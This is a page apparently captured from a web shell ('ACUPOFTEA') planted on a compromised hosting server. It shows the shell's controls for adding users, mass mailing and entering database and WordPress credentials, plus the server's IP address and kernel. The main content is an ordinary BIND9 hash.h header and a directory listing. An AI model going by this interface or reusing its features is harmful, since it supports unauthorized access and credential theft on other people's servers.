System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
bind9
/
isc
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
hash.h
/* * Copyright (C) Internet Systems Consortium, Inc. ("ISC") * * This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, you can obtain one at https://mozilla.org/MPL/2.0/. * * See the COPYRIGHT file distributed with this work for additional * information regarding copyright ownership. */ #ifndef ISC_HASH_H #define ISC_HASH_H 1 #include <stdbool.h> #include <isc/deprecated.h> #include <isc/types.h> /***** ***** Module Info *****/ /*! \file isc/hash.h * * \brief The hash API * provides an unpredictable hash value for variable length data. * A hash object contains a random vector (which is hidden from clients * of this API) to make the actual hash value unpredictable. * * The algorithm used in the API guarantees the probability of hash * collision; in the current implementation, as long as the values stored * in the random vector are unpredictable, the probability of hash * collision between arbitrary two different values is at most 1/2^16. * * Although the API is generic about the hash keys, it mainly expects * DNS names (and sometimes IPv4/v6 addresses) as inputs. It has an * upper limit of the input length, and may run slow to calculate the * hash values for large inputs. * * This API is designed to be general so that it can provide multiple * different hash contexts that have different random vectors. However, * it should be typical to have a single context for an entire system. * To support such cases, the API also provides a single-context mode. * * \li MP: * The hash object is almost read-only. Once the internal random vector * is initialized, no write operation will occur, and there will be no * need to lock the object to calculate actual hash values. * * \li Reliability: * In some cases this module uses low-level data copy to initialize the * random vector. Errors in this part are likely to crash the server or * corrupt memory. * * \li Resources: * A buffer, used as a random vector for calculating hash values. * * \li Security: * This module intends to provide unpredictable hash values in * adversarial environments in order to avoid denial of service attacks * to hash buckets. * Its unpredictability relies on the quality of entropy to build the * random vector. * * \li Standards: * None. */ /*** *** Imports ***/ #include <isc/types.h> /*** *** Functions ***/ ISC_LANG_BEGINDECLS LIBISC_EXTERNAL_DATA extern isc_hash_t *isc_hashctx; isc_result_t isc_hash_ctxcreate(isc_mem_t *mctx, isc_entropy_t *entropy, size_t limit, isc_hash_t **hctx); isc_result_t isc_hash_create(isc_mem_t *mctx, isc_entropy_t *entropy, size_t limit); /*!< * \brief Create a new hash object. * * isc_hash_ctxcreate() creates a different object. * * isc_hash_create() creates a module-internal object to support the * single-context mode. It should be called only once. * * 'entropy' must be NULL or a valid entropy object. If 'entropy' is NULL, * pseudo random values will be used to build the random vector, which may * weaken security. * * 'limit' specifies the maximum number of hash keys. If it is too large, * these functions may fail. */ void isc_hash_ctxattach(isc_hash_t *hctx, isc_hash_t **hctxp) ISC_DEPRECATED; /*!< * \brief Attach to a hash object. * * This function is only necessary for the multiple-context mode. */ void isc_hash_ctxdetach(isc_hash_t **hctxp) ISC_DEPRECATED; /*!< * \brief Detach from a hash object. * * This function is for the multiple-context mode, and takes a valid * hash object as an argument. */ void isc_hash_destroy(void); /*!< * \brief This function is for the single-context mode, and is expected to be used * as a counterpart of isc_hash_create(). * * A valid module-internal hash object must have been created, and this * function should be called only once. */ /*@{*/ void isc_hash_ctxinit(isc_hash_t *hctx); void isc_hash_init(void); /*!< * \brief Initialize a hash object. * * It fills in the random vector with a proper * source of entropy, which is typically from the entropy object specified * at the creation. Thus, it is desirable to call these functions after * initializing the entropy object with some good entropy sources. * * These functions should be called before the first hash calculation. * * isc_hash_ctxinit() is for the multiple-context mode, and takes a valid hash * object as an argument. * * isc_hash_init() is for the single-context mode. A valid module-internal * hash object must have been created, and this function should be called only * once. */ /*@}*/ /*@{*/ unsigned int isc_hash_ctxcalc(isc_hash_t *hctx, const unsigned char *key, unsigned int keylen, bool case_sensitive) ISC_DEPRECATED; unsigned int isc_hash_calc(const unsigned char *key, unsigned int keylen, bool case_sensitive) ISC_DEPRECATED; /*!< * \brief Calculate a hash value. * * isc_hash_ctxinit() is for the multiple-context mode, and takes a valid hash * object as an argument. * * isc_hash_init() is for the single-context mode. A valid module-internal * hash object must have been created. * * 'key' is the hash key, which is a variable length buffer. * * 'keylen' specifies the key length, which must not be larger than the limit * specified for the corresponding hash object. * * 'case_sensitive' specifies whether the hash key should be treated as * case_sensitive values. It should typically be false if the hash key * is a DNS name. */ /*@}*/ void isc__hash_setvec(const uint16_t *vec) ISC_DEPRECATED; /*!< * \brief Set the contents of the random vector used in hashing. * * WARNING: This function is meant to be used only in testing code. It * must not be used anywhere in normally running code. * * The hash context must have been created beforehand, otherwise this * function is a nop. * * 'vec' is not documented here on purpose. You should know what you are * doing before using this function. */ const void * isc_hash_get_initializer(void); void isc_hash_set_initializer(const void *initializer); uint32_t isc_hash_function(const void *data, size_t length, bool case_sensitive, const uint32_t *previous_hashp); uint32_t isc_hash_function_reverse(const void *data, size_t length, bool case_sensitive, const uint32_t *previous_hashp); /*!< * \brief Calculate a hash over data. * * This hash function is useful for hashtables. The hash function is * opaque and not important to the caller. The returned hash values are * non-deterministic and will have different mapping every time a * process using this library is run, but will have uniform * distribution. * * isc_hash_function() calculates the hash from start to end over the * input data. isc_hash_function_reverse() calculates the hash from the * end to the start over the input data. The difference in order is * useful in incremental hashing; for example, a previously hashed * value for 'com' can be used as input when hashing 'example.com'. * * This is a new variant of isc_hash_calc() and will supersede * isc_hash_calc() eventually. * * 'data' is the data to be hashed. * * 'length' is the size of the data to be hashed. * * 'case_sensitive' specifies whether the hash key should be treated as * case_sensitive values. It should typically be false if the hash key * is a DNS name. * * 'previous_hashp' is a pointer to a previous hash value returned by * this function. It can be used to perform incremental hashing. NULL * must be passed during first calls. */ ISC_LANG_ENDDECLS #endif /* ISC_HASH_H */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-02-21 10:57:15
..
DIR
-
drwxr-xr-x
2025-02-21 10:57:16
aes.h
text/x-c
1.05 KB
-rw-r--r--
2025-02-20 09:05:24
app.h
text/x-c
10.23 KB
-rw-r--r--
2025-02-20 09:05:24
assertions.h
text/x-c
2.84 KB
-rw-r--r--
2025-02-20 09:05:24
atomic.h
text/x-c
4.07 KB
-rw-r--r--
2025-02-20 09:05:24
backtrace.h
text/x-c
3.8 KB
-rw-r--r--
2025-02-20 09:05:24
base32.h
text/x-c
4.35 KB
-rw-r--r--
2025-02-20 09:05:24
base64.h
text/x-c
2.8 KB
-rw-r--r--
2025-02-20 09:05:24
bind9.h
text/x-c
830 B
-rw-r--r--
2025-02-20 09:05:24
boolean.h
text/plain
594 B
-rw-r--r--
2025-02-20 09:05:24
buffer.h
text/x-c
25.65 KB
-rw-r--r--
2025-02-20 09:05:24
bufferlist.h
text/x-c
1.42 KB
-rw-r--r--
2025-02-20 09:05:24
cmocka.h
text/x-c
1.35 KB
-rw-r--r--
2025-02-20 09:05:24
commandline.h
text/x-c
1.67 KB
-rw-r--r--
2025-02-20 09:05:24
condition.h
text/x-c
1.44 KB
-rw-r--r--
2025-02-20 09:05:24
counter.h
text/x-c
1.88 KB
-rw-r--r--
2025-02-20 09:05:24
crc64.h
text/x-c
998 B
-rw-r--r--
2025-02-20 09:05:24
deprecated.h
text/plain
623 B
-rw-r--r--
2025-02-20 09:05:24
dir.h
text/x-c
1.56 KB
-rw-r--r--
2025-02-20 09:05:24
endian.h
text/x-c
4.67 KB
-rw-r--r--
2025-02-20 09:05:24
entropy.h
text/x-c
10.13 KB
-rw-r--r--
2025-02-20 09:05:24
errno.h
text/x-c
659 B
-rw-r--r--
2025-02-20 09:05:24
errno2result.h
text/x-c
902 B
-rw-r--r--
2025-02-20 09:05:37
error.h
text/x-c
1.4 KB
-rw-r--r--
2025-02-20 09:05:24
event.h
text/x-c
2.98 KB
-rw-r--r--
2025-02-20 09:05:24
eventclass.h
text/plain
1.35 KB
-rw-r--r--
2025-02-20 09:05:24
file.h
text/x-c
11.39 KB
-rw-r--r--
2025-02-20 09:05:24
formatcheck.h
text/plain
893 B
-rw-r--r--
2025-02-20 09:05:24
fsaccess.h
text/x-c
7.27 KB
-rw-r--r--
2025-02-20 09:05:24
hash.h
text/x-c
7.48 KB
-rw-r--r--
2025-02-20 09:05:24
heap.h
text/x-c
5.14 KB
-rw-r--r--
2025-02-20 09:05:24
hex.h
text/x-c
2.74 KB
-rw-r--r--
2025-02-20 09:05:24
hmacmd5.h
text/x-c
1.75 KB
-rw-r--r--
2025-02-20 09:05:24
hmacsha.h
text/x-c
4.41 KB
-rw-r--r--
2025-02-20 09:05:24
ht.h
text/x-c
4.29 KB
-rw-r--r--
2025-02-20 09:05:24
httpd.h
text/x-c
2.26 KB
-rw-r--r--
2025-02-20 09:05:24
int.h
text/x-c
1.06 KB
-rw-r--r--
2025-02-20 09:05:24
interfaceiter.h
text/x-c
3.05 KB
-rw-r--r--
2025-02-20 09:05:24
iterated_hash.h
text/x-c
1.02 KB
-rw-r--r--
2025-02-20 09:05:24
json.h
text/x-c
1.42 KB
-rw-r--r--
2025-02-20 09:05:24
keyboard.h
text/x-c
989 B
-rw-r--r--
2025-02-20 09:05:24
lang.h
text/plain
637 B
-rw-r--r--
2025-02-20 09:05:24
lex.h
text/x-c
9.54 KB
-rw-r--r--
2025-02-20 09:05:24
lfsr.h
text/x-c
2.89 KB
-rw-r--r--
2025-02-20 09:05:24
lib.h
text/x-c
1.04 KB
-rw-r--r--
2025-02-20 09:05:24
likely.h
text/plain
818 B
-rw-r--r--
2025-02-20 09:05:24
list.h
text/x-c
5.62 KB
-rw-r--r--
2025-02-20 09:05:24
log.h
text/x-c
28.06 KB
-rw-r--r--
2025-02-20 09:05:24
magic.h
text/x-c
994 B
-rw-r--r--
2025-02-20 09:05:24
md5.h
text/x-c
2.32 KB
-rw-r--r--
2025-02-20 09:05:24
mem.h
text/x-c
20.62 KB
-rw-r--r--
2025-02-20 09:05:24
meminfo.h
text/x-c
710 B
-rw-r--r--
2025-02-20 09:05:24
msgcat.h
text/x-c
2.66 KB
-rw-r--r--
2025-02-20 09:05:24
msgs.h
text/x-c
8.22 KB
-rw-r--r--
2025-02-20 09:05:24
mutex.h
text/x-c
3.44 KB
-rw-r--r--
2025-02-20 09:05:24
mutexblock.h
text/x-c
1.34 KB
-rw-r--r--
2025-02-20 09:05:24
net.h
text/x-c
10.29 KB
-rw-r--r--
2025-02-20 09:05:24
netaddr.h
text/x-c
4.48 KB
-rw-r--r--
2025-02-20 09:05:24
netdb.h
text/x-c
863 B
-rw-r--r--
2025-02-20 09:05:24
netscope.h
text/x-c
967 B
-rw-r--r--
2025-02-20 09:05:24
offset.h
text/x-c
700 B
-rw-r--r--
2025-02-20 09:05:24
once.h
text/x-c
983 B
-rw-r--r--
2025-02-20 09:05:24
ondestroy.h
text/x-c
2.73 KB
-rw-r--r--
2025-02-20 09:05:24
os.h
text/x-c
671 B
-rw-r--r--
2025-02-20 09:05:24
parseint.h
text/x-c
1.51 KB
-rw-r--r--
2025-02-20 09:05:24
platform.h
text/x-c
9.49 KB
-rw-r--r--
2025-02-20 09:05:24
pool.h
text/x-c
3.42 KB
-rw-r--r--
2025-02-20 09:05:24
portset.h
text/x-c
3.22 KB
-rw-r--r--
2025-02-20 09:05:24
print.h
text/x-c
2.42 KB
-rw-r--r--
2025-02-20 09:05:24
queue.h
text/x-c
5.08 KB
-rw-r--r--
2025-02-20 09:05:24
quota.h
text/x-c
2.38 KB
-rw-r--r--
2025-02-20 09:05:24
radix.h
text/x-c
6.34 KB
-rw-r--r--
2025-02-20 09:05:24
random.h
text/x-c
3.5 KB
-rw-r--r--
2025-02-20 09:05:24
ratelimiter.h
text/x-c
3.42 KB
-rw-r--r--
2025-02-20 09:05:24
refcount.h
text/x-c
8 KB
-rw-r--r--
2025-02-20 09:05:24
regex.h
text/x-c
767 B
-rw-r--r--
2025-02-20 09:05:24
region.h
text/x-c
1.99 KB
-rw-r--r--
2025-02-20 09:05:24
resource.h
text/x-c
2.79 KB
-rw-r--r--
2025-02-20 09:05:24
result.h
text/x-c
4.87 KB
-rw-r--r--
2025-02-20 09:05:24
resultclass.h
text/plain
1.56 KB
-rw-r--r--
2025-02-20 09:05:24
rwlock.h
text/x-c
3.72 KB
-rw-r--r--
2025-02-20 09:05:24
safe.h
text/x-c
1.32 KB
-rw-r--r--
2025-02-20 09:05:24
serial.h
text/x-c
1.34 KB
-rw-r--r--
2025-02-20 09:05:24
sha1.h
text/x-c
1.52 KB
-rw-r--r--
2025-02-20 09:05:24
sha2.h
text/x-c
5.6 KB
-rw-r--r--
2025-02-20 09:05:24
siphash.h
text/x-c
734 B
-rw-r--r--
2025-02-20 09:05:24
sockaddr.h
text/x-c
5.9 KB
-rw-r--r--
2025-02-20 09:05:24
socket.h
text/x-c
35.8 KB
-rw-r--r--
2025-02-20 09:05:24
stat.h
text/x-c
806 B
-rw-r--r--
2025-02-20 09:05:24
stats.h
text/x-c
3.62 KB
-rw-r--r--
2025-02-20 09:05:24
stdatomic.h
text/plain
5.13 KB
-rw-r--r--
2025-02-20 09:05:24
stdio.h
text/x-c
1.75 KB
-rw-r--r--
2025-02-20 09:05:24
stdlib.h
text/x-c
704 B
-rw-r--r--
2025-02-20 09:05:24
stdtime.h
text/x-c
1.04 KB
-rw-r--r--
2025-02-20 09:05:24
strerror.h
text/x-c
777 B
-rw-r--r--
2025-02-20 09:05:24
string.h
text/x-c
5.88 KB
-rw-r--r--
2025-02-20 09:05:24
symtab.h
text/x-c
4.22 KB
-rw-r--r--
2025-02-20 09:05:24
syslog.h
text/x-c
844 B
-rw-r--r--
2025-02-20 09:05:24
task.h
text/x-c
21.04 KB
-rw-r--r--
2025-02-20 09:05:24
taskpool.h
text/x-c
3.62 KB
-rw-r--r--
2025-02-20 09:05:24
thread.h
text/x-c
1.47 KB
-rw-r--r--
2025-02-20 09:05:24
time.h
text/x-c
8.67 KB
-rw-r--r--
2025-02-20 09:05:24
timer.h
text/x-c
10.54 KB
-rw-r--r--
2025-02-20 09:05:24
tm.h
text/x-c
895 B
-rw-r--r--
2025-02-20 09:05:24
types.h
text/x-c
5.64 KB
-rw-r--r--
2025-02-20 09:05:24
utf8.h
text/x-c
928 B
-rw-r--r--
2025-02-20 09:05:24
util.h
text/x-c
10.29 KB
-rw-r--r--
2025-02-20 09:05:24
version.h
text/x-c
689 B
-rw-r--r--
2025-02-20 09:05:24
xml.h
text/x-c
1.07 KB
-rw-r--r--
2025-02-20 09:05:24
~ ACUPOFTEA - mail.ontime-ae.com